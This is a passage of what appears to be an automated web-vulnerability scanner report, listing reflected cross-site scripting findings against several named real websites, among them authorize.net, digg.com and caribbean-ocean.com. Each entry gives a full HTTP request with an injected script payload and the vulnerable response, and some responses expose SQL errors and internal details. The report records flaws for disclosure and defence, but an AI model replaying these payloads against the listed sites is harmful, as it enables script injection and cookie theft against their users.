Host:   http://tours.sapha.com
Path:   /

Issue detail

The value of the scs_tid request parameter is copied into the HTML document as plain text between tags. The payload 69442<script>alert(1)</script>7db2dee7925 was submitted in the scs_tid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?scs_sid=2546&scs_tid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000074)%3C/script%3E69442<script>alert(1)</script>7db2dee7925&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 603

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT 1 FROM site_application t1 WHERE t1.site_application_isactive = 1 A
...[SNIP]...
</script>69442<script>alert(1)</script>7db2dee7925<br>
...[SNIP]...

5.104. https://verify.authorize.net/anetseal/ [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://verify.authorize.net
Path:   /anetseal/

Issue detail

The value of the rurl request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e4830%20style%3dx%3aexpr/**/ession(alert(1))%20dfd967efe8f was submitted in the rurl parameter. This input was echoed as e4830 style=x:expr/**/ession(alert(1)) dfd967efe8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /anetseal/?pid=3de2b6f5-d068-4960-b93c-80b3d36d8ffe&rurl=https%3A//www.clone-systems.com/ecommerce/login.php%3Faction%3Dsend_password_emaile4830%20style%3dx%3aexpr/**/ession(alert(1))%20dfd967efe8f HTTP/1.1
Host: verify.authorize.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:17:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5955


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<title>Authorize.Net Verified Merchant Seal</title>
<meta name="GENERATOR" Content="Microsoft Visual St
...[SNIP]...
<a href= https://www.clone-systems.com/ecommerce/login.php?action=send_password_emaile4830 style=x:expr/**/ession(alert(1)) dfd967efe8f >
...[SNIP]...

5.105. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 44a0a<script>alert(1)</script>21007e051bb was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/acunetix_reports/reports/firstmateonlinecom/blind-sql-injection-xss-dork-cross-site-scripting-poc-report.html44a0a<script>alert(1)</script>21007e051bb HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Age: 0
Date: Fri, 06 May 2011 20:09:07 GMT
Via: NS-CACHE: 100
Etag: "4ee52e4d9af28f6ad0ba9e9bb34c78553fba3e28"
Content-Length: 205
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Fri, 06 May 2011 20:19:06 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/acunetix_reports/reports/firstmateonlinecom/blind-sql-injection-xss-dork-cross-site-scripting-poc-report.html44a0a<script>alert(1)</script>21007e051bb", "diggs": 0});

5.106. http://www.advisorsquare.com/useradmin/Authenticate.asp [ComeBack parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The value of the ComeBack request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6348c"><script>alert(1)</script>e788ceeb686 was submitted in the ComeBack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /useradmin/Authenticate.asp?GroupId=85732&ComeBack=/useradmin/YourCPPortfolio.asp6348c"><script>alert(1)</script>e788ceeb686 HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2188
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=DCCHGKOBPLPMPBMHHEMNDHHG; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:54 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
...[SNIP]...
<input type="hidden" Name="ComeBack" value="/useradmin/YourCPPortfolio.asp6348c"><script>alert(1)</script>e788ceeb686">
...[SNIP]...

5.107. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The value of the GroupId request parameter is copied into an HTML comment. The payload f8cb1--><script>alert(1)</script>c3e8d872928 was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /useradmin/Authenticate.asp?GroupId=85732f8cb1--><script>alert(1)</script>c3e8d872928&ComeBack=/useradmin/YourCPPortfolio.asp HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2233
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=HACHGKOBLIOECFPOADGMADDH; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:51 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
...[SNIP]...
<input type="hidden" name="AdvisorID" value="85732f8cb1--><script>alert(1)</script>c3e8d872928">
...[SNIP]...

5.108. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The value of the GroupId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9045"><script>alert(1)</script>8c93197ec3e was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /useradmin/Authenticate.asp?GroupId=85732e9045"><script>alert(1)</script>8c93197ec3e&ComeBack=/useradmin/YourCPPortfolio.asp HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2231
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=EACHGKOBOILHIFCFOLHPDECB; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:51 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
...[SNIP]...
<input type="hidden" name="GroupID" value="85732e9045"><script>alert(1)</script>8c93197ec3e">
...[SNIP]...

5.109. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/alertsArchv.asp

Issue detail

The value of the Year request parameter is copied into the HTML document as plain text between tags. The payload 431bc<script>alert(1)</script>069fa5b0117 was submitted in the Year parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nr/alertsArchv.asp?Year=2006431bc<script>alert(1)</script>069fa5b0117 HTTP/1.1
Cookie: ASPSESSIONIDSSSASTRS=AOLLAMJAKHMOMMMNLJCHGNIN
Host: www.brownrudnick.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:47:10 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 13992
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=KPGCALMBKHIIAMHHIBKADIIJ; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Alerts and Newsletters -
...[SNIP]...
</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(Year = 2006431bc<script>alert(1)</script>069fa5b0117)'.<br>
...[SNIP]...

5.110. http://www.brownrudnick.com/nr/articlesindv.asp [ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/articlesindv.asp

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload 5d6aa<script>alert(1)</script>78389e1a6ea was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nr/articlesindv.asp?ID=554f0bd0<script>alert(document.cookie)</script>ba5591b9a235d6aa<script>alert(1)</script>78389e1a6ea HTTP/1.1
Pragma: no-cache
Host: www.brownrudnick.com
Connection: Keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:48:17 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11278
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=EEHCALMBMMHJOCDFIKKJMEBE; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link r
...[SNIP]...
</script>ba5591b9a235d6aa<script>alert(1)</script>78389e1a6ea)'.<br>
...[SNIP]...

5.111. http://www.caribbean-ocean.com/accommodation2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 3ff42<a>78f0dfbcbea was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /accommodation2.php?id=82893ff42<a>78f0dfbcbea HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:24 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 9767

1054: Unknown column '82893ff42' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT area_id AS country_id
FROM accommodation
WHERE accomm_id = 82893ff42<a>78f0dfbcbea</textarea>
...[SNIP]...

5.112. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 42305%3balert(1)//992dbf45a01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42305;alert(1)//992dbf45a01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accommodation2.php?id=/42305%3balert(1)//992dbf45a018289 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:42 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10262

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/42305;alert(1)//992dbf45a018289' at line 1<br /><br /><textarea rows="10" cols="100">SELECT area_id AS country_id
FROM accommodation
WHERE accomm_id = /42305;alert(1)//992dbf45a018289</textarea>
...[SNIP]...

5.113. http://www.caribbean-ocean.com/get-image.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload b4e6a<a>5d16744a2c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /get-image.php?id=18696b4e6a<a>5d16744a2c HTTP/1.1
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.caribbean-ocean.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:59:44 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 847
Content-Type: image/jpg

1054: Unknown column '18696b4e6a' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image
FROM image
WHERE image_id = 18696b4e6a<a>5d16744a2c</textarea>
Warning: mysql_num_r
...[SNIP]...

5.114. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0726<a>c9b4bd0777c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /get-image.php?id=1/c0726<a>c9b4bd0777c8696 HTTP/1.1
Cookie: PHPSESSID=56e9tj63arfnmfkpi7rsto854a5vfekl
Host: www.caribbean-ocean.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:58:43 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 844
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpg

1054: Unknown column 'c0726' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image
FROM image
WHERE image_id = 1/c0726<a>c9b4bd0777c8696</textarea>
Warning: mysql_num_rows
...[SNIP]...

5.115. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Barbados%20Resort%20holidays/91

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8cbea<script>alert(1)</script>7cda621b4b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /luxury%20Barbados%20Resort%20holidays/918cbea<script>alert(1)</script>7cda621b4b3 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:56 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6943

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<textarea rows="10" cols="100">SELECT *
FROM area
WHERE area_id IN (918cbea<script>alert(1)</script>7cda621b4b3)
ORDER BY area_name ASC</textarea>
...[SNIP]...

5.116. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Jamaica%20Resort%20holidays/105

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4529a<script>alert(1)</script>38d4ed9b16f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /luxury%20Jamaica%20Resort%20holidays/1054529a<script>alert(1)</script>38d4ed9b16f HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:24 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6944

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<textarea rows="10" cols="100">SELECT *
FROM area
WHERE area_id IN (1054529a<script>alert(1)</script>38d4ed9b16f)
ORDER BY area_name ASC</textarea>
...[SNIP]...

5.117. http://www.dhmiservices.com/ClickContact/js.ashx [img parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dhmiservices.com
Path:   /ClickContact/js.ashx

Issue detail

The value of the img request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 239be"%3balert(1)//e2bc96337d2 was submitted in the img parameter. This input was echoed as 239be";alert(1)//e2bc96337d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ClickContact/js.ashx?Agent=950b13d4-72fe-46ca-891d-8922b0525b3e&img=http%3A%2F%2Fwww.dhmiservices.com%2FImageHandler.ashx%3Fimg_id%3D3824239be"%3balert(1)//e2bc96337d2 HTTP/1.1
Host: www.dhmiservices.com
Proxy-Connection: keep-alive
Referer: http://www.agentadvantage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 653
Set-Cookie: BIGipServerdhmweb_http_pool=2237947146.20480.0000; expires=Fri, 06-May-2011 20:40:49 GMT; path=/

function load2058797069() {
var load = window.open('http://950b13d4-72fe-46ca-891d-8922b0525b3e.dhmiservices.com/ClickContact/popup.aspx?var1=950b13d4-
...[SNIP]...
<img src=\"http://www.dhmiservices.com/ImageHandler.ashx?img_id=3824239be";alert(1)//e2bc96337d2\" border=\"0\" alt=\"Click to Call\"/>
...[SNIP]...

5.118. http://www.dhmiservices.com/ImageHandler.ashx [img_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dhmiservices.com
Path:   /ImageHandler.ashx

Issue detail

The value of the img_id request parameter is copied into the HTML document as plain text between tags. The payload e1fbf<script>alert(1)</script>cf716ce4fbd was submitted in the img_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ImageHandler.ashx?img_id=3824e1fbf<script>alert(1)</script>cf716ce4fbd HTTP/1.1
Host: www.dhmiservices.com
Proxy-Connection: keep-alive
Referer: http://www.agentadvantage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 118
Set-Cookie: BIGipServerdhmweb_http_pool=2237947146.20480.0000; expires=Fri, 06-May-2011 20:40:26 GMT; path=/

Conversion failed when converting the nvarchar value '3824e1fbf<script>alert(1)</script>cf716ce4fbd' to data type int.

5.119. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dominionenterprises.com
Path:   /main/do/businesses/id/13/category/For%20Businesses

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7db69<img%20src%3da%20onerror%3dalert(1)>eafdbdd941c was submitted in the REST URL parameter 7. This input was echoed as 7db69<img src=a onerror=alert(1)>eafdbdd941c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /main/do/businesses/id/13/category/For%20Businesses7db69<img%20src%3da%20onerror%3dalert(1)>eafdbdd941c HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
